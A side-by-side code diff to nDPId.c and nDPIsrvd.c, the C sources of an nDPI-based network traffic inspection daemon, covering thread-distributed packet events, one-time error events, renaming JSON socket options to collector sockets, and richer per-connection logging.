ndpi_serialize_string_string(&workflow->ndpi_serializer, ev, packet_event_name_table[PACKET_EVENT_INVALID]); ndpi_serialize_string_string(&workflow->ndpi_serializer, ev, packet_event_name_table[PACKET_EVENT_INVALID]);
} }
jsonize_basic(reader_thread); jsonize_basic(reader_thread, (event == PACKET_EVENT_PAYLOAD_FLOW ? 1 : 0));
if (event == PACKET_EVENT_PAYLOAD_FLOW) if (event == PACKET_EVENT_PAYLOAD_FLOW)
{ {
@@ -2370,7 +2385,7 @@ static void jsonize_packet_event(struct nDPId_reader_thread * const reader_threa
if (ndpi_serialize_string_binary(&workflow->ndpi_serializer, "pkt", base64_data, base64_data_len) != 0) if (ndpi_serialize_string_binary(&workflow->ndpi_serializer, "pkt", base64_data, base64_data_len) != 0)
{ {
logger(1, logger(1,
"[%8llu, %d] JSON serializing base64 packet buffer failed", "[%8llu, %zu] JSON serializing base64 packet buffer failed",
reader_thread->workflow->packets_captured, reader_thread->workflow->packets_captured,
reader_thread->array_index); reader_thread->array_index);
} }
@@ -2378,7 +2393,7 @@ static void jsonize_packet_event(struct nDPId_reader_thread * const reader_threa
else else
{ {
logger(1, logger(1,
"[%8llu, %d] Base64 encoding failed with: %s.", "[%8llu, %zu] Base64 encoding failed with: %s.",
reader_thread->workflow->packets_captured, reader_thread->workflow->packets_captured,
reader_thread->array_index, reader_thread->array_index,
base64_ret_strings[base64_retval]); base64_ret_strings[base64_retval]);
@@ -2403,7 +2418,7 @@ static void jsonize_flow_event(struct nDPId_reader_thread * const reader_thread,
{ {
ndpi_serialize_string_string(&workflow->ndpi_serializer, ev, flow_event_name_table[FLOW_EVENT_INVALID]); ndpi_serialize_string_string(&workflow->ndpi_serializer, ev, flow_event_name_table[FLOW_EVENT_INVALID]);
} }
jsonize_basic(reader_thread); jsonize_basic(reader_thread, 1);
jsonize_flow(workflow, flow_ext); jsonize_flow(workflow, flow_ext);
jsonize_l3_l4(workflow, &flow_ext->flow_basic); jsonize_l3_l4(workflow, &flow_ext->flow_basic);
@@ -2466,7 +2481,7 @@ static void jsonize_flow_detection_event(struct nDPId_reader_thread * const read
{ {
ndpi_serialize_string_string(&workflow->ndpi_serializer, ev, flow_event_name_table[FLOW_EVENT_INVALID]); ndpi_serialize_string_string(&workflow->ndpi_serializer, ev, flow_event_name_table[FLOW_EVENT_INVALID]);
} }
jsonize_basic(reader_thread); jsonize_basic(reader_thread, 1);
jsonize_flow(workflow, &flow_info->flow_extended); jsonize_flow(workflow, &flow_info->flow_extended);
jsonize_l3_l4(workflow, &flow_info->flow_extended.flow_basic); jsonize_l3_l4(workflow, &flow_info->flow_extended.flow_basic);
@@ -2686,7 +2701,16 @@ __attribute__((format(printf, 3, 4))) static void jsonize_basic_eventf(struct nD
"datalink", "datalink",
pcap_datalink(reader_thread->workflow->pcap_handle)); pcap_datalink(reader_thread->workflow->pcap_handle));
jsonize_basic(reader_thread); switch (event)
{
case MAX_FLOW_TO_TRACK:
case FLOW_MEMORY_ALLOCATION_FAILED:
jsonize_basic(reader_thread, 1);
break;
default:
jsonize_basic(reader_thread, 0);
break;
}
if (format != NULL) if (format != NULL)
{ {
@@ -3143,10 +3167,12 @@ static void do_periodically_work(struct nDPId_reader_thread * const reader_threa
reader_thread->workflow->last_scan_time = reader_thread->workflow->last_global_time; reader_thread->workflow->last_scan_time = reader_thread->workflow->last_global_time;
} }
if (reader_thread->workflow->last_status_time + nDPId_options.daemon_status_interval + if (reader_thread->workflow->last_status_time + nDPId_options.daemon_status_interval +
reader_thread->array_index * 1000 <= reader_thread->workflow->last_global_time) reader_thread->array_index * 1000 <=
reader_thread->workflow->last_global_time)
{ {
jsonize_daemon(reader_thread, DAEMON_EVENT_STATUS); jsonize_daemon(reader_thread, DAEMON_EVENT_STATUS);
reader_thread->workflow->last_status_time = reader_thread->workflow->last_global_time + reader_thread->array_index * 1000; reader_thread->workflow->last_status_time =
reader_thread->workflow->last_global_time + reader_thread->array_index * 1000;
} }
#ifdef ENABLE_MEMORY_PROFILING #ifdef ENABLE_MEMORY_PROFILING
if (reader_thread->workflow->last_memory_usage_log_time + nDPId_options.memory_profiling_log_interval <= if (reader_thread->workflow->last_memory_usage_log_time + nDPId_options.memory_profiling_log_interval <=
@@ -3159,6 +3185,12 @@ static void do_periodically_work(struct nDPId_reader_thread * const reader_threa
#endif #endif
} }
static int distribute_single_packet(struct nDPId_reader_thread * const reader_thread)
{
return (reader_thread->workflow->packets_captured % nDPId_options.reader_thread_count ==
reader_thread->array_index);
}
static void ndpi_process_packet(uint8_t * const args, static void ndpi_process_packet(uint8_t * const args,
struct pcap_pkthdr const * const header, struct pcap_pkthdr const * const header,
uint8_t const * const packet) uint8_t const * const packet)
@@ -3185,7 +3217,7 @@ static void ndpi_process_packet(uint8_t * const args,
uint16_t l4_payload_len = 0; uint16_t l4_payload_len = 0;
uint16_t type = 0; uint16_t type = 0;
int thread_index = nDPId_THREAD_DISTRIBUTION_SEED; // generated with `dd if=/dev/random bs=1024 count=1 |& hd' size_t thread_index = nDPId_THREAD_DISTRIBUTION_SEED; // generated with `dd if=/dev/random bs=1024 count=1 |& hd'
if (reader_thread == NULL) if (reader_thread == NULL)
{ {
@@ -3225,8 +3257,11 @@ static void ndpi_process_packet(uint8_t * const args,
} }
else else
{ {
jsonize_packet_event(reader_thread, header, packet, type, ip_offset, 0, 0, NULL, PACKET_EVENT_PAYLOAD); if (distribute_single_packet(reader_thread) != 0)
jsonize_basic_eventf(reader_thread, UNKNOWN_L3_PROTOCOL, "%s%u", "protocol", type); {
jsonize_packet_event(reader_thread, header, packet, type, ip_offset, 0, 0, NULL, PACKET_EVENT_PAYLOAD);
jsonize_basic_eventf(reader_thread, UNKNOWN_L3_PROTOCOL, "%s%u", "protocol", type);
}
return; return;
} }
ip_size = header->caplen - ip_offset; ip_size = header->caplen - ip_offset;
@@ -3235,14 +3270,17 @@ static void ndpi_process_packet(uint8_t * const args,
{ {
if (header->caplen < header->len) if (header->caplen < header->len)
{ {
jsonize_packet_event(reader_thread, header, packet, type, ip_offset, 0, 0, NULL, PACKET_EVENT_PAYLOAD); if (distribute_single_packet(reader_thread) != 0)
jsonize_basic_eventf(reader_thread, {
CAPTURE_SIZE_SMALLER_THAN_PACKET_SIZE, jsonize_packet_event(reader_thread, header, packet, type, ip_offset, 0, 0, NULL, PACKET_EVENT_PAYLOAD);
"%s%u %s%u", jsonize_basic_eventf(reader_thread,
"size", CAPTURE_SIZE_SMALLER_THAN_PACKET_SIZE,
header->caplen, "%s%u %s%u",
"expected", "size",
header->len); header->caplen,
"expected",
header->len);
}
} }
} }
@@ -3251,9 +3289,17 @@ static void ndpi_process_packet(uint8_t * const args,
{ {
if (ip_size < sizeof(*ip)) if (ip_size < sizeof(*ip))
{ {
jsonize_packet_event(reader_thread, header, packet, type, ip_offset, 0, 0, NULL, PACKET_EVENT_PAYLOAD); if (distribute_single_packet(reader_thread) != 0)
jsonize_basic_eventf( {
reader_thread, IP4_SIZE_SMALLER_THAN_HEADER, "%s%u %s%zu", "size", ip_size, "expected", sizeof(*ip)); jsonize_packet_event(reader_thread, header, packet, type, ip_offset, 0, 0, NULL, PACKET_EVENT_PAYLOAD);
jsonize_basic_eventf(reader_thread,
IP4_SIZE_SMALLER_THAN_HEADER,
"%s%u %s%zu",
"size",
ip_size,
"expected",
sizeof(*ip));
}
return; return;
} }
@@ -3262,9 +3308,12 @@ static void ndpi_process_packet(uint8_t * const args,
if (ndpi_detection_get_l4( if (ndpi_detection_get_l4(
(uint8_t *)ip, ip_size, &l4_ptr, &l4_len, &flow_basic.l4_protocol, NDPI_DETECTION_ONLY_IPV4) != 0) (uint8_t *)ip, ip_size, &l4_ptr, &l4_len, &flow_basic.l4_protocol, NDPI_DETECTION_ONLY_IPV4) != 0)
{ {
jsonize_packet_event(reader_thread, header, packet, type, ip_offset, 0, 0, NULL, PACKET_EVENT_PAYLOAD); if (distribute_single_packet(reader_thread) != 0)
jsonize_basic_eventf( {
reader_thread, IP4_L4_PAYLOAD_DETECTION_FAILED, "%s%zu", "l4_data_len", ip_size - sizeof(*ip)); jsonize_packet_event(reader_thread, header, packet, type, ip_offset, 0, 0, NULL, PACKET_EVENT_PAYLOAD);
jsonize_basic_eventf(
reader_thread, IP4_L4_PAYLOAD_DETECTION_FAILED, "%s%zu", "l4_data_len", ip_size - sizeof(*ip));
}
return; return;
} }
@@ -3277,14 +3326,17 @@ static void ndpi_process_packet(uint8_t * const args,
{ {
if (ip_size < sizeof(ip6->ip6_hdr)) if (ip_size < sizeof(ip6->ip6_hdr))
{ {
jsonize_packet_event(reader_thread, header, packet, type, ip_offset, 0, 0, NULL, PACKET_EVENT_PAYLOAD); if (distribute_single_packet(reader_thread) != 0)
jsonize_basic_eventf(reader_thread, {
IP6_SIZE_SMALLER_THAN_HEADER, jsonize_packet_event(reader_thread, header, packet, type, ip_offset, 0, 0, NULL, PACKET_EVENT_PAYLOAD);
"%s%u %s%zu", jsonize_basic_eventf(reader_thread,
"size", IP6_SIZE_SMALLER_THAN_HEADER,
ip_size, "%s%u %s%zu",
"expected", "size",
sizeof(ip6->ip6_hdr)); ip_size,
"expected",
sizeof(ip6->ip6_hdr));
}
return; return;
} }
@@ -3292,9 +3344,12 @@ static void ndpi_process_packet(uint8_t * const args,
if (ndpi_detection_get_l4( if (ndpi_detection_get_l4(
(uint8_t *)ip6, ip_size, &l4_ptr, &l4_len, &flow_basic.l4_protocol, NDPI_DETECTION_ONLY_IPV6) != 0) (uint8_t *)ip6, ip_size, &l4_ptr, &l4_len, &flow_basic.l4_protocol, NDPI_DETECTION_ONLY_IPV6) != 0)
{ {
jsonize_packet_event(reader_thread, header, packet, type, ip_offset, 0, 0, NULL, PACKET_EVENT_PAYLOAD); if (distribute_single_packet(reader_thread) != 0)
jsonize_basic_eventf( {
reader_thread, IP6_L4_PAYLOAD_DETECTION_FAILED, "%s%zu", "l4_data_len", ip_size - sizeof(*ip)); jsonize_packet_event(reader_thread, header, packet, type, ip_offset, 0, 0, NULL, PACKET_EVENT_PAYLOAD);
jsonize_basic_eventf(
reader_thread, IP6_L4_PAYLOAD_DETECTION_FAILED, "%s%zu", "l4_data_len", ip_size - sizeof(*ip));
}
return; return;
} }
@@ -3319,8 +3374,11 @@ static void ndpi_process_packet(uint8_t * const args,
} }
else else
{ {
jsonize_packet_event(reader_thread, header, packet, type, ip_offset, 0, 0, NULL, PACKET_EVENT_PAYLOAD); if (distribute_single_packet(reader_thread) != 0)
jsonize_basic_eventf(reader_thread, UNKNOWN_L3_PROTOCOL, "%s%u", "protocol", type); {
jsonize_packet_event(reader_thread, header, packet, type, ip_offset, 0, 0, NULL, PACKET_EVENT_PAYLOAD);
jsonize_basic_eventf(reader_thread, UNKNOWN_L3_PROTOCOL, "%s%u", "protocol", type);
}
return; return;
} }
@@ -3331,15 +3389,25 @@ static void ndpi_process_packet(uint8_t * const args,
if (header->caplen < (l4_ptr - packet) + sizeof(struct ndpi_tcphdr)) if (header->caplen < (l4_ptr - packet) + sizeof(struct ndpi_tcphdr))
{ {
jsonize_packet_event( if (distribute_single_packet(reader_thread) != 0)
reader_thread, header, packet, type, ip_offset, (l4_ptr - packet), l4_len, NULL, PACKET_EVENT_PAYLOAD); {
jsonize_basic_eventf(reader_thread, jsonize_packet_event(reader_thread,
TCP_PACKET_TOO_SHORT, header,
"%s%u %s%zu", packet,
"size", type,
header->caplen, ip_offset,
"expected", (l4_ptr - packet),
(l4_ptr - packet) + sizeof(struct ndpi_tcphdr)); l4_len,
NULL,
PACKET_EVENT_PAYLOAD);
jsonize_basic_eventf(reader_thread,
TCP_PACKET_TOO_SHORT,
"%s%u %s%zu",
"size",
header->caplen,
"expected",
(l4_ptr - packet) + sizeof(struct ndpi_tcphdr));
}
return; return;
} }
tcp = (struct ndpi_tcphdr *)l4_ptr; tcp = (struct ndpi_tcphdr *)l4_ptr;
@@ -3355,15 +3423,25 @@ static void ndpi_process_packet(uint8_t * const args,
if (header->caplen < (l4_ptr - packet) + sizeof(struct ndpi_udphdr)) if (header->caplen < (l4_ptr - packet) + sizeof(struct ndpi_udphdr))
{ {
jsonize_packet_event( if (distribute_single_packet(reader_thread) != 0)
reader_thread, header, packet, type, ip_offset, (l4_ptr - packet), l4_len, NULL, PACKET_EVENT_PAYLOAD); {
jsonize_basic_eventf(reader_thread, jsonize_packet_event(reader_thread,
UDP_PACKET_TOO_SHORT, header,
"%s%u %s%zu", packet,
"size", type,
header->caplen, ip_offset,
"expected", (l4_ptr - packet),
(l4_ptr - packet) + sizeof(struct ndpi_udphdr)); l4_len,
NULL,
PACKET_EVENT_PAYLOAD);
jsonize_basic_eventf(reader_thread,
UDP_PACKET_TOO_SHORT,
"%s%u %s%zu",
"size",
header->caplen,
"expected",
(l4_ptr - packet) + sizeof(struct ndpi_udphdr));
}
return; return;
} }
udp = (struct ndpi_udphdr *)l4_ptr; udp = (struct ndpi_udphdr *)l4_ptr;
@@ -3520,31 +3598,57 @@ static void ndpi_process_packet(uint8_t * const args,
if (workflow->cur_active_flows == workflow->max_active_flows) if (workflow->cur_active_flows == workflow->max_active_flows)
{ {
jsonize_packet_event( if (workflow->max_flow_to_track_reached == 0)
reader_thread, header, packet, type, ip_offset, (l4_ptr - packet), l4_len, NULL, PACKET_EVENT_PAYLOAD); {
jsonize_basic_eventf(reader_thread, workflow->max_flow_to_track_reached = 1;
MAX_FLOW_TO_TRACK,
"%s%llu %s%llu %s%llu %s%llu", jsonize_packet_event(reader_thread,
"current_active", header,
workflow->cur_active_flows, packet,
"current_idle", type,
workflow->cur_idle_flows, ip_offset,
"max_active", (l4_ptr - packet),
workflow->max_active_flows, l4_len,
"max_idle", NULL,
workflow->max_idle_flows); PACKET_EVENT_PAYLOAD);
jsonize_basic_eventf(reader_thread,
MAX_FLOW_TO_TRACK,
"%s%llu %s%llu %s%llu %s%llu",
"current_active",
workflow->cur_active_flows,
"current_idle",
workflow->cur_idle_flows,
"max_active",
workflow->max_active_flows,
"max_idle",
workflow->max_idle_flows);
}
return; return;
} }
workflow->max_flow_to_track_reached = 0;
flow_to_process = (struct nDPId_flow_info *)add_new_flow(workflow, &flow_basic, FS_INFO, hashed_index); flow_to_process = (struct nDPId_flow_info *)add_new_flow(workflow, &flow_basic, FS_INFO, hashed_index);
if (flow_to_process == NULL) if (flow_to_process == NULL)
{ {
jsonize_packet_event( if (workflow->flow_allocation_already_failed == 0)
reader_thread, header, packet, type, ip_offset, (l4_ptr - packet), l4_len, NULL, PACKET_EVENT_PAYLOAD); {
jsonize_basic_eventf( workflow->flow_allocation_already_failed = 1;
reader_thread, FLOW_MEMORY_ALLOCATION_FAILED, "%s%zu", "size", sizeof(*flow_to_process));
jsonize_packet_event(reader_thread,
header,
packet,
type,
ip_offset,
(l4_ptr - packet),
l4_len,
NULL,
PACKET_EVENT_PAYLOAD);
jsonize_basic_eventf(
reader_thread, FLOW_MEMORY_ALLOCATION_FAILED, "%s%zu", "size", sizeof(*flow_to_process));
}
return; return;
} }
workflow->flow_allocation_already_failed = 0;
workflow->total_active_flows++; workflow->total_active_flows++;
flow_to_process->flow_extended.flow_id = __sync_fetch_and_add(&global_flow_id, 1); flow_to_process->flow_extended.flow_id = __sync_fetch_and_add(&global_flow_id, 1);
@@ -3788,6 +3892,10 @@ static void run_pcap_loop(struct nDPId_reader_thread * const reader_thread)
nready = epoll_wait(epoll_fd, events, events_size, timeout_ms); nready = epoll_wait(epoll_fd, events, events_size, timeout_ms);
if (errno != 0) if (errno != 0)
{ {
if (errno == EINTR)
{
continue;
}
logger(1, "Epoll returned error: %s", strerror(errno)); logger(1, "Epoll returned error: %s", strerror(errno));
__sync_fetch_and_add(&reader_thread->workflow->error_or_eof, 1); __sync_fetch_and_add(&reader_thread->workflow->error_or_eof, 1);
break; break;
@@ -3841,16 +3949,16 @@ static void * processing_thread(void * const ndpi_thread_arg)
{ {
struct nDPId_reader_thread * const reader_thread = (struct nDPId_reader_thread *)ndpi_thread_arg; struct nDPId_reader_thread * const reader_thread = (struct nDPId_reader_thread *)ndpi_thread_arg;
reader_thread->json_sockfd = -1; reader_thread->collector_sockfd = -1;
reader_thread->json_sock_reconnect = 1; reader_thread->collector_sock_reconnect = 1;
errno = 0; errno = 0;
if (connect_to_json_socket(reader_thread) != 0) if (connect_to_collector(reader_thread) != 0)
{ {
logger(1, logger(1,
"Thread %u: Could not connect to nDPIsrvd Collector at %s, will try again later. Error: %s", "Thread %zu: Could not connect to nDPIsrvd Collector at %s, will try again later. Error: %s",
reader_thread->array_index, reader_thread->array_index,
nDPId_options.json_sockpath, nDPId_options.collector_sockpath,
(errno != 0 ? strerror(errno) : "Internal Error.")); (errno != 0 ? strerror(errno) : "Internal Error."));
} }
else else
@@ -3859,7 +3967,7 @@ static void * processing_thread(void * const ndpi_thread_arg)
} }
run_pcap_loop(reader_thread); run_pcap_loop(reader_thread);
fcntl(reader_thread->json_sockfd, F_SETFL, fcntl(reader_thread->json_sockfd, F_GETFL, 0) & ~O_NONBLOCK); fcntl(reader_thread->collector_sockfd, F_SETFL, fcntl(reader_thread->collector_sockfd, F_GETFL, 0) & ~O_NONBLOCK);
__sync_fetch_and_add(&reader_thread->workflow->error_or_eof, 1); __sync_fetch_and_add(&reader_thread->workflow->error_or_eof, 1);
return NULL; return NULL;
} }
@@ -3982,13 +4090,13 @@ static void process_remaining_flows(void)
{ {
for (unsigned long long int i = 0; i < nDPId_options.reader_thread_count; ++i) for (unsigned long long int i = 0; i < nDPId_options.reader_thread_count; ++i)
{ {
if (fcntl(reader_threads[i].json_sockfd, if (fcntl(reader_threads[i].collector_sockfd,
F_SETFL, F_SETFL,
fcntl(reader_threads[i].json_sockfd, F_GETFL, 0) & ~O_NONBLOCK) == -1) fcntl(reader_threads[i].collector_sockfd, F_GETFL, 0) & ~O_NONBLOCK) == -1)
{ {
logger(1, logger(1,
"Could not set JSON fd %d to blocking mode for shutdown: %s", "Could not set JSON fd %d to blocking mode for shutdown: %s",
reader_threads[i].json_sockfd, reader_threads[i].collector_sockfd,
strerror(errno)); strerror(errno));
} }
@@ -4060,7 +4168,7 @@ static int stop_reader_threads(void)
total_flow_updates += reader_threads[i].workflow->total_flow_updates; total_flow_updates += reader_threads[i].workflow->total_flow_updates;
printf( printf(
"Stopping Thread %2d, processed %llu packets, %llu bytes\n" "Stopping Thread %2zu, processed %llu packets, %llu bytes\n"
"\tskipped flows.....: %8llu, processed flows: %8llu, idle flows....: %8llu\n" "\tskipped flows.....: %8llu, processed flows: %8llu, idle flows....: %8llu\n"
"\tnot detected flows: %8llu, guessed flows..: %8llu, detected flows: %8llu\n" "\tnot detected flows: %8llu, guessed flows..: %8llu, detected flows: %8llu\n"
"\tdetection updates.: %8llu, updated flows..: %8llu\n", "\tdetection updates.: %8llu, updated flows..: %8llu\n",
@@ -4265,8 +4373,8 @@ static int nDPId_parse_options(int argc, char ** argv)
} }
break; break;
case 'c': case 'c':
strncpy(nDPId_options.json_sockpath, optarg, sizeof(nDPId_options.json_sockpath) - 1); strncpy(nDPId_options.collector_sockpath, optarg, sizeof(nDPId_options.collector_sockpath) - 1);
nDPId_options.json_sockpath[sizeof(nDPId_options.json_sockpath) - 1] = '\0'; nDPId_options.collector_sockpath[sizeof(nDPId_options.collector_sockpath) - 1] = '\0';
break; break;
case 'd': case 'd':
daemonize_enable(); daemonize_enable();
@@ -4441,17 +4549,17 @@ static int validate_options(void)
} }
} }
#endif #endif
if (is_path_absolute("JSON socket", nDPId_options.json_sockpath) != 0) if (is_path_absolute("Collector socket", nDPId_options.collector_sockpath) != 0)
{ {
retval = 1; retval = 1;
} }
{ {
struct sockaddr_un saddr; struct sockaddr_un saddr;
if (strlen(nDPId_options.json_sockpath) >= sizeof(saddr.sun_path)) if (strlen(nDPId_options.collector_sockpath) >= sizeof(saddr.sun_path))
{ {
logger_early(1, logger_early(1,
"JSON socket path too long, current/max: %zu/%zu", "Collector socket path too long, current/max: %zu/%zu",
strlen(nDPId_options.json_sockpath), strlen(nDPId_options.collector_sockpath),
sizeof(saddr.sun_path) - 1); sizeof(saddr.sun_path) - 1);
retval = 1; retval = 1;
} }

264
nDPIsrvd.c
View File

@@ -3,6 +3,7 @@
#include <fcntl.h> #include <fcntl.h>
#include <netdb.h> #include <netdb.h>
#include <netinet/tcp.h> #include <netinet/tcp.h>
#include <pwd.h>
#include <signal.h> #include <signal.h>
#include <stdio.h> #include <stdio.h>
#include <stdlib.h> #include <stdlib.h>
@@ -38,11 +39,14 @@ struct remote_desc
int collector_sockfd; int collector_sockfd;
struct sockaddr_un peer; struct sockaddr_un peer;
unsigned long long int json_bytes; unsigned long long int json_bytes;
pid_t pid;
} event_collector_un; } event_collector_un;
struct struct
{ {
int distributor_sockfd; int distributor_sockfd;
struct sockaddr_un peer; struct sockaddr_un peer;
pid_t pid;
char * user_name;
} event_distributor_un; /* UNIX socket */ } event_distributor_un; /* UNIX socket */
struct struct
{ {
@@ -56,8 +60,8 @@ struct remote_desc
static struct static struct
{ {
struct remote_desc * desc; struct remote_desc * desc;
size_t desc_size; nDPIsrvd_ull desc_size;
size_t desc_used; nDPIsrvd_ull desc_used;
} remotes = {NULL, 0, 0}; } remotes = {NULL, 0, 0};
static int nDPIsrvd_main_thread_shutdown = 0; static int nDPIsrvd_main_thread_shutdown = 0;
@@ -74,12 +78,19 @@ static struct
char * collector_un_sockpath; char * collector_un_sockpath;
char * distributor_un_sockpath; char * distributor_un_sockpath;
char * distributor_in_address; char * distributor_in_address;
nDPIsrvd_ull max_remote_descriptors;
char * user; char * user;
char * group; char * group;
nDPIsrvd_ull cache_array_length; nDPIsrvd_ull cache_array_length;
int cache_fallback_to_blocking; int cache_fallback_to_blocking;
} nDPIsrvd_options = {.cache_array_length = nDPIsrvd_CACHE_ARRAY_LENGTH, .cache_fallback_to_blocking = 1}; } nDPIsrvd_options = {.max_remote_descriptors = nDPIsrvd_MAX_REMOTE_DESCRIPTORS,
.cache_array_length = nDPIsrvd_CACHE_ARRAY_LENGTH,
.cache_fallback_to_blocking = 1};
static void logger_nDPIsrvd(struct remote_desc const * const remote,
char const * const prefix,
char const * const format,
...);
static int fcntl_add_flags(int fd, int flags); static int fcntl_add_flags(int fd, int flags);
static int fcntl_del_flags(int fd, int flags); static int fcntl_del_flags(int fd, int flags);
static int add_in_event_fd(int epollfd, int fd); static int add_in_event_fd(int epollfd, int fd);
@@ -139,17 +150,20 @@ static int add_to_cache(struct remote_desc * const remote, uint8_t * const buf,
{ {
if (nDPIsrvd_options.cache_fallback_to_blocking == 0) if (nDPIsrvd_options.cache_fallback_to_blocking == 0)
{ {
logger(1, "Buffer cache limit (%u lines) reached, remote too slow.", utarray_len(remote->buf_cache)); logger_nDPIsrvd(remote,
"Buffer cache limit for",
"for reached, remote too slow: %u lines",
utarray_len(remote->buf_cache));
return -1; return -1;
} }
else else
{ {
logger(0, logger_nDPIsrvd(remote,
"Buffer JSON string cache limit (%u lines) reached, falling back to blocking I/O.", "Buffer JSON string cache limit for",
utarray_len(remote->buf_cache)); "reached, falling back to blocking I/O: %u lines",
utarray_len(remote->buf_cache));
if (drain_cache_blocking(remote) != 0) if (drain_cache_blocking(remote) != 0)
{ {
logger(1, "Could not drain buffer cache in blocking I/O: %s", strerror(errno));
return -1; return -1;
} }
} }
@@ -162,10 +176,10 @@ static int add_to_cache(struct remote_desc * const remote, uint8_t * const buf,
return 0; return 0;
} }
static void logger_distributor(struct remote_desc * const remote, static void logger_nDPIsrvd(struct remote_desc const * const remote,
char const * const prefix, char const * const prefix,
char const * const format, char const * const format,
...) ...)
{ {
char logbuf[512]; char logbuf[512];
va_list ap; va_list ap;
@@ -173,23 +187,28 @@ static void logger_distributor(struct remote_desc * const remote,
va_start(ap, format); va_start(ap, format);
vsnprintf(logbuf, sizeof(logbuf), format, ap); vsnprintf(logbuf, sizeof(logbuf), format, ap);
if (remote->sock_type == DISTRIBUTOR_UN) switch (remote->sock_type)
{ {
logger(1, "%s %s", prefix, logbuf); case DISTRIBUTOR_UN:
} logger(1,
else if (remote->sock_type == DISTRIBUTOR_IN) "%s PID %d (User: %s) %s",
{ prefix,
logger(1, remote->event_distributor_un.pid,
"%s %.*s:%u %s", remote->event_distributor_un.user_name,
prefix, logbuf);
(int)sizeof(remote->event_distributor_in.peer_addr), break;
remote->event_distributor_in.peer_addr, case DISTRIBUTOR_IN:
ntohs(remote->event_distributor_in.peer.sin_port), logger(1,
logbuf); "%s %.*s:%u %s",
} prefix,
else (int)sizeof(remote->event_distributor_in.peer_addr),
{ remote->event_distributor_in.peer_addr,
logger(1, "BUG: Distributor logging interface called with an collector/invalid remote"); ntohs(remote->event_distributor_in.peer.sin_port),
logbuf);
break;
case COLLECTOR_UN:
logger(1, "%s PID %d %s", prefix, remote->event_collector_un.pid, logbuf);
break;
} }
va_end(ap); va_end(ap);
@@ -210,18 +229,18 @@ static int drain_main_buffer(struct remote_desc * const remote)
} }
if (bytes_written < 0 || errno != 0) if (bytes_written < 0 || errno != 0)
{ {
logger_distributor(remote, "Distributor connection", "%d closed, send failed: %s", remote->fd, strerror(errno)); logger_nDPIsrvd(remote, "Distributor connection", "closed, send failed: %s", strerror(errno));
return -1; return -1;
} }
if (bytes_written == 0) if (bytes_written == 0)
{ {
logger_distributor(remote, "Distributor connection", "%d closed", remote->fd); logger_nDPIsrvd(remote, "Distributor connection", "closed");
return -1; return -1;
} }
if ((size_t)bytes_written < remote->buf.used) if ((size_t)bytes_written < remote->buf.used)
{ {
#if 0 #if 0
logger_distributor( logger_nDPIsrvd(
remote, "Distributor", "wrote less than expected: %zd < %zu", bytes_written, remote->buf.used); remote, "Distributor", "wrote less than expected: %zd < %zu", bytes_written, remote->buf.used);
#endif #endif
memmove(remote->buf.ptr.raw, remote->buf.ptr.raw + bytes_written, remote->buf.used - bytes_written); memmove(remote->buf.ptr.raw, remote->buf.ptr.raw + bytes_written, remote->buf.used - bytes_written);
@@ -274,16 +293,17 @@ static int drain_cache_blocking(struct remote_desc * const remote)
if (fcntl_del_flags(remote->fd, O_NONBLOCK) != 0) if (fcntl_del_flags(remote->fd, O_NONBLOCK) != 0)
{ {
logger(1, "Error setting distributor fd flags: %s", strerror(errno)); logger_nDPIsrvd(remote, "Error setting distributor", "fd flags to blocking mode: %s", strerror(errno));
return -1; return -1;
} }
if (drain_cache(remote) != 0) if (drain_cache(remote) != 0)
{ {
logger_nDPIsrvd(remote, "Could not drain buffer cache for", "in blocking I/O: %s", strerror(errno));
retval = -1; retval = -1;
} }
if (fcntl_add_flags(remote->fd, O_NONBLOCK) != 0) if (fcntl_add_flags(remote->fd, O_NONBLOCK) != 0)
{ {
logger(1, "Error setting distributor fd flags: %s", strerror(errno)); logger_nDPIsrvd(remote, "Error setting distributor", "fd flags to non-blocking mode: %s", strerror(errno));
return -1; return -1;
} }
@@ -298,6 +318,7 @@ static int handle_outgoing_data(int epollfd, struct remote_desc * const remote)
} }
if (drain_cache(remote) != 0) if (drain_cache(remote) != 0)
{ {
logger_nDPIsrvd(remote, "Could not drain buffer cache for", ": %s", strerror(errno));
disconnect_client(epollfd, remote); disconnect_client(epollfd, remote);
return -1; return -1;
} }
@@ -354,7 +375,7 @@ static int create_listen_sockets(void)
int opt = 1; int opt = 1;
if (setsockopt(distributor_in_sockfd, SOL_SOCKET, SO_REUSEADDR, &opt, sizeof(opt)) < 0) if (setsockopt(distributor_in_sockfd, SOL_SOCKET, SO_REUSEADDR, &opt, sizeof(opt)) < 0)
{ {
logger(1, "TCP/IP socket setsockopt(SO_REUSEADDR) failed: %s", strerror(errno)); logger(1, "Setting TCP/IP socket option SO_REUSEADDR failed: %s", strerror(errno));
} }
} }
@@ -363,7 +384,7 @@ static int create_listen_sockets(void)
if (setsockopt(collector_un_sockfd, SOL_SOCKET, SO_REUSEADDR, &opt, sizeof(opt)) < 0 || if (setsockopt(collector_un_sockfd, SOL_SOCKET, SO_REUSEADDR, &opt, sizeof(opt)) < 0 ||
setsockopt(distributor_un_sockfd, SOL_SOCKET, SO_REUSEADDR, &opt, sizeof(opt)) < 0) setsockopt(distributor_un_sockfd, SOL_SOCKET, SO_REUSEADDR, &opt, sizeof(opt)) < 0)
{ {
logger(1, "UNIX socket setsockopt(SO_REUSEADDR) failed: %s", strerror(errno)); logger(1, "Setting UNIX socket option SO_REUSEADDR failed: %s", strerror(errno));
} }
} }
@@ -484,7 +505,7 @@ static int create_listen_sockets(void)
return 0; return 0;
} }
static struct remote_desc * get_unused_remote_descriptor(enum sock_type type, int remote_fd, size_t max_buffer_size) static struct remote_desc * get_remote_descriptor(enum sock_type type, int remote_fd, size_t max_buffer_size)
{ {
if (remotes.desc_used == remotes.desc_size) if (remotes.desc_used == remotes.desc_size)
{ {
@@ -513,7 +534,7 @@ static struct remote_desc * get_unused_remote_descriptor(enum sock_type type, in
return NULL; return NULL;
} }
static void free_remote_descriptor_data(void) static void free_remotes(void)
{ {
for (size_t i = 0; i < remotes.desc_size; ++i) for (size_t i = 0; i < remotes.desc_size; ++i)
{ {
@@ -585,7 +606,21 @@ static void disconnect_client(int epollfd, struct remote_desc * const current)
del_event(epollfd, current->fd); del_event(epollfd, current->fd);
if (close(current->fd) != 0) if (close(current->fd) != 0)
{ {
logger(1, "Error closing fd: %s", strerror(errno)); switch (current->sock_type)
{
case COLLECTOR_UN:
logger_nDPIsrvd(current, "Error closing collector connection", ": %s", strerror(errno));
break;
case DISTRIBUTOR_UN:
case DISTRIBUTOR_IN:
logger_nDPIsrvd(current, "Error closing distributor connection", ": %s", strerror(errno));
break;
}
}
if (current->sock_type == DISTRIBUTOR_UN)
{
free(current->event_distributor_un.user_name);
